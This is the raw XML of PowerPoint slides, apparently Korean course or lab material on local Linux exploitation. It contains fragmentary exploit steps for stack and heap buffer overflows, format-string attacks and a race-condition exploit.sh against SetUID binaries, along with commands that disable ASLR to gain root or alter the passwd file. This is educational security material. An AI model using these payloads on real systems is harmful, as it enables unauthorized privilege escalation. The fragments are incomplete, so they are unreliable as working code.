                        <a:t> (buffer + </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sizeof</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> (buffer) - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sizeof</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> (shellcode), shellcode, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sizeof</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> (shellcode))</a:t>
                      </a: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상태에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25500369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kernel.randomize_va_space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execstack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5.11, 32-bit)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1642146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/sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/stack*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dirty="0"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/stack*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–w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>kernel.randomize_va_space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dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –c /sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –q /sec/stack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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2190521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70601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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1051460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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1597882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/sec/heap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heap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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>heap.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>heap.c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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>goodfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ /sec/heap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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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206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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>힙 버퍼 오버플로우 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 수정할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/heap $(python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/sec/heap $(python -c 'print "A"*112+"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2044762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및 파일명 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3504433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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="854417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/sec/heap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heap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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/heap </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l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4097695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-M intel -d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(CentOS5.5)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8210927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사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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-M intel -d /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more</a:t>
            </a:r>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="797414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/sec/</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/sec/</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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>       "\xd0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73733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716877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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24053029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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>        "\xa0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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309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dirty="0"/>
              <a:t>/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>       "\xa0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256212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및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13699609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5.5)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4272127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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cd /sec</a:t>
            </a:r>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dirty="0" err="1">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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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dirty="0"/>
              <a:t>$ exit</a:t>
            </a:r>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/sec/</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34080140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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>getRoot.o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–w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>kernel.randomize_va_space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15550007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Race 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통해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Race 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Race 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36027875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 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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cd /sec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ls –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile.c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dirty="0" err="1"/>
              <a:t>createTempFile.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>createTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tempfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 작성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vim /sec/exploit.sh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dirty="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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1491760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/sec/exploit.sh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/sec/exploit.sh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/sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 권한 상승을 통한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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/sec/exploit.sh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while [ "$old" == "$new"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/sec/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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-s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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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echo "STOP... The passwd file has ben changed"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while [ "$old" == "$new"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2153323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757048151"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1329855" y="1690688"/>
          <a:ext cx="9532293" cy="4678807"/>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시스템 보안로그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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
